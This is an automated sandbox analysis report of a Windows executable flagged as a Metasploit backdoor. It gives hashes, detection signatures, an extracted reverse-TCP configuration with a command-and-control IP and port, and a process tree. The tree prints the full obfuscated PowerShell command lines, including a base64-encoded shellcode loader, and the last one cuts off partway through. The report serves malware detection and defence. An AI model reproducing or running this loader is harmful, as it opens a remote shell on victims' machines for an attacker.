metasploit | 60463c10a65048a11e37eb784b1b5f9dd9197d7bffe8cde8daa50cb56ef4d39e

Analysis

max time kernel
93s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
31-03-2024 17:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe
Size

132KB
MD5

59f770974597fa27ef9e484feaca9cda
SHA1

c402332adb19c3973a64214dc313feccd1c8671d
SHA256

60463c10a65048a11e37eb784b1b5f9dd9197d7bffe8cde8daa50cb56ef4d39e
SHA512

7f31239c49dab452ff288a284bb14e5b7158239a3344599ead533b8282c7408d976fd8fadb6729840859d514c955468e1134b92bdf09ba001d65297ae01341c4
SSDEEP

3072:42sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXcOuBXJ:hbJhs7QW69hd1MMdxPe9N9uA0hu9TBZR

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

18.189.106.45:13167

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
15	1368	powershell.exe
15	1368	powershell.exe
15	1368	powershell.exe
15	1368	powershell.exe
15	1368	powershell.exe
15	1368	powershell.exe
15	1368	powershell.exe
15	1368	powershell.exe
15	1368	powershell.exe
15	1368	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4440 powershell.exe
4440 powershell.exe
3964 powershell.exe
3964 powershell.exe
1368 powershell.exe
1368 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4440 powershell.exe
Token: SeDebugPrivilege 3964 powershell.exe
Token: SeDebugPrivilege 1368 powershell.exe

pid	process
4440	powershell.exe
4440	powershell.exe
3964	powershell.exe
3964	powershell.exe
1368	powershell.exe
1368	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

59f770974597fa27ef9e484feaca9cda_JaffaCakes118.execmd.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 1376 wrote to memory of 2868	1376	59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe	cmd.exe
PID 1376 wrote to memory of 2868	1376	59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe	cmd.exe
PID 2868 wrote to memory of 4440	2868	cmd.exe	powershell.exe
PID 2868 wrote to memory of 4440	2868	cmd.exe	powershell.exe
PID 4440 wrote to memory of 3964	4440	powershell.exe	powershell.exe
PID 4440 wrote to memory of 3964	4440	powershell.exe	powershell.exe
PID 3964 wrote to memory of 1368	3964	powershell.exe	powershell.exe
PID 3964 wrote to memory of 1368	3964	powershell.exe	powershell.exe
PID 3964 wrote to memory of 1368	3964	powershell.exe	powershell.exe
PID 1368 wrote to memory of 2732	1368	powershell.exe	csc.exe
PID 1368 wrote to memory of 2732	1368	powershell.exe	csc.exe
PID 1368 wrote to memory of 2732	1368	powershell.exe	csc.exe
PID 2732 wrote to memory of 2532	2732	csc.exe	cvtres.exe
PID 2732 wrote to memory of 2532	2732	csc.exe	cvtres.exe
PID 2732 wrote to memory of 2532	2732	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1376

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\45E2.tmp\45E3.tmp\45E4.bat C:\Users\Admin\AppData\Local\Temp\59f770974597fa27ef9e484feaca9cda_JaffaCakes118.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windows 1 -Command "sv h -;sv o ec;sv uCu ((gv h).value.toString()+(gv o).value.toString());powershell (gv uCu).value.toString() 'JABSAEoARgAgAD0AIAAnACQATgBQAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATgBQAHMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4AGIAYgAsADAAeABkAGEALAAwAHgAYgBkACwAMAB4ADQAYQAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA4ADIALAAwAHgAYQBlACwAMAB4AGEAOAAsADAAeAAzAGMALAAwAHgAYwBlACwAMAB4ADMAOQAsADAAeABhADMALAAwAHgAYgBmACwAMAB4ADIAZQAsADAAeABiAGEALAAwAHgAZABjACwAMAB4ADgAZQAsADAAeABmAGMALAAwAHgAMwAzACwAMAB4AGYAOQAsADAAeAA5ADUALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAzADIALAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA5AGEALAAwAHgAYgA5ACwAMAB4AGIAMwAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAZgAsADAAeAAxAGIALAAwAHgAZgBlACwAMAB4ADkAYQAsADAAeAA3AGEALAAwAHgANwBhACwAMAB4ADMAMQAsADAAeAAxAGEALAAwAHgANABiACwAMAB4ADQAMgAsADAAeAA5AGQALAAwAHgAZAA4ACwAMAB4AGMAZAAsADAAeAAzAGUALAAwAHgAZABmACwAMAB4ADAAYwAsADAAeAAyAGUALAAwAHgANwBlACwAMAB4ADEAMAAsADAAeAA0ADEALAAwAHgAMgBmACwAMAB4ADQANwAsADAAeABlADcALAAwAHgAMgBmACwAMAB4AGMAMAAsADAAeAAxADUALAAwAHgANwBjACwAMAB4ADkAZAAsADAAeAAwAGUALAAwAHgAMQAxACwAMAB4AGMAMAAsADAAeAAxAGUALAAwAHgAMgBlACwAMAB4AGYANQAsADAAeAA5ADMALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAA4AGQALAAwAHgAOQBlACwAMAB4ADIAYQAsADAAeAAwADQALAAwAHgAMgAxACwAMAB4AGEAMQAsADAAeAA3AGEALAAwAHgANgBlACwAMAB4AGYAMQAsADAAeABiADkALAAwAHgAZgAxACwAMAB4ADIAOQAsADAAeAAyADIALAAwAHgAZQA5ACwAMAB4ADAANAAsADAAeAAxADkALAAwAHgAYQA3ACwAMAB4AGMAMAAsADAAeAA3ADMALAAwAHgAYQAxACwAMAB4ADkAOQAsADAAeAAyAGQALAAwAHgAMwAyACwAMAB4ADUAMgAsADAAeABlAGQALAAwAHgANQBhACwAMAB4AGMANAAsADAAeABiADIALAAwAHgAMwBmACwAMAB4ADkAYwAsADAAeAAwADYALAAwAHgAZgA1ACwAMAB4ADQAZAAsADAAeABiADAALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeAA3ADYALAAwAHgAMgA4ACwAMAB4AGYAZgAsADAAeAAyADUALAAwAHgAOAA1ACwAMAB4AGQANQAsADAAeABmADgALAAwAHgAZgBkACwAMAB4AGYANwAsADAAeAAwADEALAAwAHgAOABjACwAMAB4AGUAMQAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4ADMANgAsADAAeABjADYALAAwAHgANgAxACwAMAB4ADAANwAsADAAeABhADAALAAwAHgAOABkACwAMAB4ADYAZQAsADAAeABlAGMALAAwAHgAYQA2ACwAMAB4AGMAYQAsADAAeAA3ADIALAAwAHgAZgAzACwAMAB4ADYAYgAsADAAeAA2ADEALAAwAHgAOABlACwAMAB4ADcAOAAsADAAeAA4AGEALAAwAHgAYQA2ACwAMAB4ADAANgAsADAAeAAzAGEALAAwAHgAYQA5ACwAMAB4ADYAMgAsADAAeAA0ADIALAAwAHgAOQA5ACwAMAB4AGQAMAAsADAAeAAzADMALAAwAHgAMgBlACwAMAB4ADQAYwAsADAAeABlAGMALAAwAHgAMgA0ACwAMAB4ADkANgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMgA0ACwAMAB4AGUAYwAsADAAeABjAGYALAAwAHgAYwA1ACwAMAB4ADQAOQAsADAAeABiADAALAAwAHgANAA3ACwAMAB4ADAAOQAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADkAOAAsADAAeAAwADUALAAwAHgAOQAwACwAMAB4ADMAOAAsADAAeABhAGEALAAwAHgAOABhACwAMAB4ADAAYQAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADQAMwAsADAAeAA5ADQALAAwAHgAMgAwACwAMAB4ADkAZQAsADAAeAA0ADQALAAwAHgAMgA3ACwAMAB4AGYAZQAsADAAeAAxADgALAAwAHgAMAA0ACwAMAB4AGQANgAsADAAeABmAGYALAAwAHgANQA4ACwAMAB4ADAAYwAsADAAeAAxAGMALAAwAHgAYQBiACwAMAB4ADAAOAAsADAAeAAyADYALAAwAHgAYgA1ACwAMAB4AGQANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMAYQAsADAAeAAwADEALAAwAHgANwBlACwAMAB4AGIAZAAsADAAeABhAGMALAAwAHgAYgA4ACwAMAB4AGMAMgAsADAAeABhAGIALAAwAHgAMAAxACwAMAB4AGQANQAsADAAeAAzAGUALAAwAHgAMgBjACwAMAB4ADYAYQAsADAAeAA0AGEALAAwAHgAYgA2ACwAMAB4AGMAYQAsADAAeABkAGMALAAwAHgAYwA0ACwAMAB4ADkAOAAsADAAeAA0ADIALAAwAHgAOQBjACwAMAB4AGIANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4ADcANAAsADAAeABkAGYALAAwAHgANQA2ACwAMAB4ADYAYwAsADAAeAA2ADQALAAwAHgAZQAwACwAMAB4AGIAYwAsADAAeAAwADUALAAwAHgAMABlACwAMAB4ADAAZgAsADAAeAA2ADkALAAwAHgANwBkACwAMAB4AGEANgAsADAAeABiADYALAAwAHgAMwAwACwAMAB4AGYANQAsADAAeAA1ADcALAAwAHgAMwA2ACwAMAB4AGUAZgAsADAAeAA3ADMALAAwAHgANQA3ACwAMAB4AGIAYwAsADAAeAAxAGMALAAwAHgAOAAzACwAMAB4ADEAOQAsADAAeAAzADUALAAwAHgANgA4ACwAMAB4ADkANwAsADAAeABjAGQALAAwAHgAYgA1ACwAMAB4ADIANwAsADAAeABjADUALAAwAHgANQBiACwAMAB4AGMAOQAsADAAeAA5AGQALAAwAHgANgAwACwAMAB4ADYAMwAsADAAeAA1AGYALAAwAHgAMQBhACwAMAB4ADIAMwAsADAAeAAzADQALAAwAHgAZgA3ACwAMAB4ADIAMAAsADAAeAAxADIALAAwAHgANwAyACwAMAB4ADUAOAAsADAAeABkAGEALAAwAHgANwAxACwAMAB4ADAAOQAsADAAeAA1ADEALAAwAHgANABlACwAMAB4ADMAYQAsADAAeAA2ADUALAAwAHgAOQBlACwAMAB4ADkAZQAsADAAeABiAGEALAAwAHgANwA1ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAYgBhACwAMAB4ADEAZAAsADAAeABhAGMALAAwAHgAYQBjACwAMAB4AGUAOAAsADAAeAAzADgALAAwAHgAYgAzACwAMAB4ADcAOAAsADAAeAA5AGQALAAwAHgAOQAxACwAMAB4ADIANgAsADAAeAA4ADMALAAwAHgAZgA0ACwAMAB4ADQANgAsADAAeABlADAALAAwAHgAZQBiACwAMAB4AGYAYQAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIAMwAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4AGQANgAsADAAeAA4ADgALAAwAHgAZAAzACwAMAB4AGQAMAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4AGUANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAawBFAEcAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGsARQBHAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABrAEUARwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFIASgBGACkAKQA7ACQAUgBEAEMATQAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABiAHcAaQBBACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAdwBpAEEAIAAkAFIARABDAE0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAUgBEAEMATQAgACQAZQAiADsAfQA='"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABSAEoARgAgAD0AIAAnACQATgBQAHMAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATgBQAHMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4AGIAYgAsADAAeABkAGEALAAwAHgAYgBkACwAMAB4ADQAYQAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1ADgALAAwAHgAMQA3ACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA4ADIALAAwAHgAYQBlACwAMAB4AGEAOAAsADAAeAAzAGMALAAwAHgAYwBlACwAMAB4ADMAOQAsADAAeABhADMALAAwAHgAYgBmACwAMAB4ADIAZQAsADAAeABiAGEALAAwAHgAZABjACwAMAB4ADgAZQAsADAAeABmAGMALAAwAHgAMwAzACwAMAB4AGYAOQAsADAAeAA5ADUALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAzADIALAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA5AGEALAAwAHgAYgA5ACwAMAB4AGIAMwAsADAAeABjADkALAAwAHgAMgA5ACwAMAB4AGMAZgAsADAAeAAxAGIALAAwAHgAZgBlACwAMAB4ADkAYQAsADAAeAA3AGEALAAwAHgANwBhACwAMAB4ADMAMQAsADAAeAAxAGEALAAwAHgANABiACwAMAB4ADQAMgAsADAAeAA5AGQALAAwAHgAZAA4ACwAMAB4AGMAZAAsADAAeAAzAGUALAAwAHgAZABmACwAMAB4ADAAYwAsADAAeAAyAGUALAAwAHgANwBlACwAMAB4ADEAMAAsADAAeAA0ADEALAAwAHgAMgBmACwAMAB4ADQANwAsADAAeABlADcALAAwAHgAMgBmACwAMAB4AGMAMAAsADAAeAAxADUALAAwAHgANwBjACwAMAB4ADkAZAAsADAAeAAwAGUALAAwAHgAMQAxACwAMAB4AGMAMAAsADAAeAAxAGUALAAwAHgAMgBlACwAMAB4AGYANQAsADAAeAA5ADMALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAA4AGQALAAwAHgAOQBlACwAMAB4ADIAYQAsADAAeAAwADQALAAwAHgAMgAxACwAMAB4AGEAMQAsADAAeAA3AGEALAAwAHgANgBlACwAMAB4AGYAMQAsADAAeABiADkALAAwAHgAZgAxACwAMAB4ADIAOQAsADAAeAAyADIALAAwAHgAZQA5ACwAMAB4ADAANAAsADAAeAAxADkALAAwAHgAYQA3ACwAMAB4AGMAMAAsADAAeAA3ADMALAAwAHgAYQAxACwAMAB4ADkAOQAsADAAeAAyAGQALAAwAHgAMwAyACwAMAB4ADUAMgAsADAAeABlAGQALAAwAHgANQBhACwAMAB4AGMANAAsADAAeABiADIALAAwAHgAMwBmACwAMAB4ADkAYwAsADAAeAAwADYALAAwAHgAZgA1ACwAMAB4ADQAZAAsADAAeABiADAALAAwAHgAOAA4ACwAMAB4AGMAZAAsADAAeAA3ADYALAAwAHgAMgA4ACwAMAB4AGYAZgAsADAAeAAyADUALAAwAHgAOAA1ACwAMAB4AGQANQAsADAAeABmADgALAAwAHgAZgBkACwAMAB4AGYANwAsADAAeAAwADEALAAwAHgAOABjACwAMAB4AGUAMQAsADAAeAA1ADAALAAwAHgAYwAyACwAMAB4ADMANgAsADAAeABjADYALAAwAHgANgAxACwAMAB4ADAANwAsADAAeABhADAALAAwAHgAOABkACwAMAB4ADYAZQAsADAAeABlAGMALAAwAHgAYQA2ACwAMAB4AGMAYQAsADAAeAA3ADIALAAwAHgAZgAzACwAMAB4ADYAYgAsADAAeAA2ADEALAAwAHgAOABlACwAMAB4ADcAOAAsADAAeAA4AGEALAAwAHgAYQA2ACwAMAB4ADAANgAsADAAeAAzAGEALAAwAHgAYQA5ACwAMAB4ADYAMgAsADAAeAA0ADIALAAwAHgAOQA5ACwAMAB4AGQAMAAsADAAeAAzADMALAAwAHgAMgBlACwAMAB4ADQAYwAsADAAeABlAGMALAAwAHgAMgA0ACwAMAB4ADkANgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMgA0ACwAMAB4AGUAYwAsADAAeABjAGYALAAwAHgAYwA1ACwAMAB4ADQAOQAsADAAeABiADAALAAwAHgANAA3ACwAMAB4ADAAOQAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADkAOAAsADAAeAAwADUALAAwAHgAOQAwACwAMAB4ADMAOAAsADAAeABhAGEALAAwAHgAOABhACwAMAB4ADAAYQAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADQAMwAsADAAeAA5ADQALAAwAHgAMgAwACwAMAB4ADkAZQAsADAAeAA0ADQALAAwAHgAMgA3ACwAMAB4AGYAZQAsADAAeAAxADgALAAwAHgAMAA0ACwAMAB4AGQANgAsADAAeABmAGYALAAwAHgANQA4ACwAMAB4ADAAYwAsADAAeAAxAGMALAAwAHgAYQBiACwAMAB4ADAAOAAsADAAeAAyADYALAAwAHgAYgA1ACwAMAB4AGQANAAsADAAeABjADIALAAwAHgAYgA2ACwAMAB4ADMAYQAsADAAeAAwADEALAAwAHgANwBlACwAMAB4AGIAZAAsADAAeABhAGMALAAwAHgAYgA4ACwAMAB4AGMAMgAsADAAeABhAGIALAAwAHgAMAAxACwAMAB4AGQANQAsADAAeAAzAGUALAAwAHgAMgBjACwAMAB4ADYAYQAsADAAeAA0AGEALAAwAHgAYgA2ACwAMAB4AGMAYQAsADAAeABkAGMALAAwAHgAYwA0ACwAMAB4ADkAOAAsADAAeAA0ADIALAAwAHgAOQBjACwAMAB4AGIANAAsADAAeAA1ADgALAAwAHgAMwAzACwAMAB4ADcANAAsADAAeABkAGYALAAwAHgANQA2ACwAMAB4ADYAYwAsADAAeAA2ADQALAAwAHgAZQAwACwAMAB4AGIAYwAsADAAeAAwADUALAAwAHgAMABlACwAMAB4ADAAZgAsADAAeAA2ADkALAAwAHgANwBkACwAMAB4AGEANgAsADAAeABiADYALAAwAHgAMwAwACwAMAB4AGYANQAsADAAeAA1ADcALAAwAHgAMwA2ACwAMAB4AGUAZgAsADAAeAA3ADMALAAwAHgANQA3ACwAMAB4AGIAYwAsADAAeAAxAGMALAAwAHgAOAAzACwAMAB4ADEAOQAsADAAeAAzADUALAAwAHgANgA4ACwAMAB4ADkANwAsADAAeABjAGQALAAwAHgAYgA1ACwAMAB4ADIANwAsADAAeABjADUALAAwAHgANQBiACwAMAB4AGMAOQAsADAAeAA5AGQALAAwAHgANgAwACwAMAB4ADYAMwAsADAAeAA1AGYALAAwAHgAMQBhACwAMAB4ADIAMwAsADAAeAAzADQALAAwAHgAZgA3ACwAMAB4ADIAMAAsADAAeAAxADIALAAwAHgANwAyACwAMAB4ADUAOAAsADAAeABkAGEALAAwAHgANwAxACwAMAB4ADAAOQAsADAAeAA1ADEALAAwAHgANABlACwAMAB4ADMAYQAsADAAeAA2ADUALAAwAHgAOQBlACwAMAB4ADkAZQAsADAAeABiAGEALAAwAHgANwA1ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAYgBhACwAMAB4ADEAZAAsADAAeABhAGMALAAwAHgAYQBjACwAMAB4AGUAOAAsADAAeAAzADgALAAwAHgAYgAzACwAMAB4ADcAOAAsADAAeAA5AGQALAAwAHgAOQAxACwAMAB4ADIANgAsADAAeAA4ADMALAAwAHgAZgA0ACwAMAB4ADQANgAsADAAeABlADAALAAwAHgAZQBiACwAMAB4AGYAYQAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIAMwAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4AGQANgAsADAAeAA4ADgALAAwAHgAZAAzACwAMAB4AGQAMAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4AGUANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAawBFAEcAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGsARQBHAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABrAEUARwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0